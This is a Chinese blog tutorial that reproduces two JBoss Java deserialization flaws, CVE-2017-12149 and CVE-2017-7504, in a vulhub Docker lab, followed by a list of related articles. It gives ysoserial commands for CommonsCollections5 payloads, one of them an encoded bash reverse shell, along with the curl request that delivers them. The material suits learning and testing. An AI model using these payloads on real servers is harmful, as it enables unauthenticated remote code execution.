JBoss漏洞分析复现

最新推荐文章于 2024-09-22 15:59:58 发布
最新推荐文章于 2024-09-22 15:59:58 发布
阅读量416 收藏
点赞数 1
分类专栏: vulhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/119826894
版权

目录

前言

JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。

CVE-2017-12149

JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。

漏洞原理

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

首先需要了解Java的序列化和反序列化。Java序列化就是指把Java对象转换为字节序列的过程,在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。Java反序列化就是指把字节序列恢复为Java对象的过程,根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。

用代码看就是:

序列化:

FileOutputStream fos = new FileOutputStream(file); 
ObjectOutputStream oos = new ObjectOutputStream(fos); 
oos.writeObject(st);

反序列化:

FileInputStream fis = new FileInputStream(file); 
ObjectInputStream ois = new ObjectInputStream(fis); 
Student st1 = (Student) ois.readObject();

CVE-2017-12149的漏洞出现在HttpInvoker组件中的ReadOnlyAccessFilter过滤器中,它从http中获取数据,通过调用readobject()方法对数据流进行反序列操作,但是没有进行检查或者过滤。这就造成了JBoss中invoker/JMXInvokerServlet路径对外开放,而且JBoss的jmx组件支持Java反序列化。

漏洞复现

首先进入CVE-2017-12149的docker环境

cd jboss
ls
cd CVE-2017-12149
sudo docker-compose up -d
docker ps

导入完成后访问http://192.168.50.113:8080/

在这里插入图片描述
编写反弹shell的命令

我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。

工具:http://www.jackson-t.ca/runtime-exec-payloads.html

在这里插入图片描述

生成序列化数据

使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMjEgMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可

开启nc监听

在这里插入图片描述

CVE-2017-7504

CVE-2017-7504为JBossMQ JMS 反序列化漏洞。

漏洞原理

CVE-2017-7504漏洞与CVE-2015-7501的漏洞原理相似,只是利用的路径稍微出现了变化,CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

漏洞复现

导入完成后访问http://192.168.50.113:8080/

在这里插入图片描述
该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,我们借助ysoserial的eCommonsCollections5利用链来复现。生成Payload:

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser

我们将1.ser文件内容作为POST Body发送:

curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser

在这里插入图片描述
执行docker-compose exec jboss bash进入容器,可见/tmp/success已成功创建。

网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
weixin_54626591的博客
05-06 254
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
关于JBOSS环境搭建和中间件漏洞复现
qq_43511592的博客
09-21 1456
服务器: windows 7 攻击机: windows 10 一、环境搭建 使用win7搭建环境,由于jboss依赖Java基本环境,所以应当先安装Java环境,使用jdk-6u14版本,Java安装完成后记得去环境变量配置 jboss安装包在jboss下载页面下载即可,为压缩包,此处使用版本为4.2.2.GA 下载完成后将压缩包内的文件夹解压到C盘根目录并改名为jboss,由于此处我们不使用其它功能——权限处理组件AOP|mysql连接驱动等暂时不安装 在命令行界面cd进入jboss目录...
jboss漏洞getshell
weixin_43999372的博客
11-07 1169
前言 最近感觉有点无聊,搞了国外一些站,学到一些知识,主要了解了windos中一些命令. 1.信息收集 首先访问该站,把目录扫描起,然后nmap扫描看看,然后找该站是否存在什么漏洞。然而并没有,扫描目录发现 8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/ 2.漏洞利用 全局...
jboss java反序列化命令执行漏洞_jboss反序列化漏洞复现(CVE-2017-7504)
weixin_42515313的博客
02-26 243
jboss反序列化漏洞复现(CVE-2017-7504)一、漏洞描述Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。二、漏洞环境搭建以及复现1、使用docker搭建漏洞环境及复现Docker-com...
JbossMQ反序列化漏洞CVE-2017-7504
最新发布
2401_82451607的博客
09-22 188
JbossMQ反序列化漏洞CVE-2017-7504
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1467
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
深入浅出带你学习JBoss中间件常见漏洞
Spontaneous_0的博客
02-19 546
深入浅出带你学习JBoss中间件常见漏洞
JBoss系列漏洞复现以及实战心得
jammny
09-10 2013
前言 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 谷歌语法:inurl:/console/ intitle:"JBoss Management" 一、JBoss JMXInvokerServlet 反序列化漏洞 JBoss在.
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1317
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2674
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)
网络安全领域___专研者.
11-28 1781
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
玄道的网安博客
06-18 1058
简介 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 环境搭建 使用vulhub和docker快速搭建环境 cd vulhub/jboss/CVE-2017-7504 docker-compo
[Vulfocus解题系列] jboss 反序列化 (CVE-2017-7504)
00勇士王子的博客
07-11 1152
漏洞介绍 名称: jboss 反序列化 (CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞
serendipity1130的博客
08-31 1006
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据: javac -cp .:common
JBoss 中间件漏洞
qq_53742230的博客
07-11 1259
JBoss 中间件漏洞复现
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3970
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
jboss漏洞复现
Shanfenglan's blog
11-23 1020
文章目录什么是jboss1. JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)原理利用2. JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)原理利用参考文章 什么是jboss java中间件,类似于weblogic,webSphere等。可以理解成是一个加强版的可以实现EJB的tomcat。它的内部集成了tomcat对servlet处理的功能,而且支持EJB,不过weblogic的性能几乎全优于它,基本可以用weblogic代替。 1. JBos
JBoss架构分析:模块化设计与性能探析
"JBoss架构分析.pdf" JBoss是一个开源的J2EE(Java 2 Platform, Enterprise Edition)应用程序服务器,它提供了企业级的服务和功能,包括但不限于EJB(Enterprise JavaBeans)、JMS(Java Message Service)和JTA...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值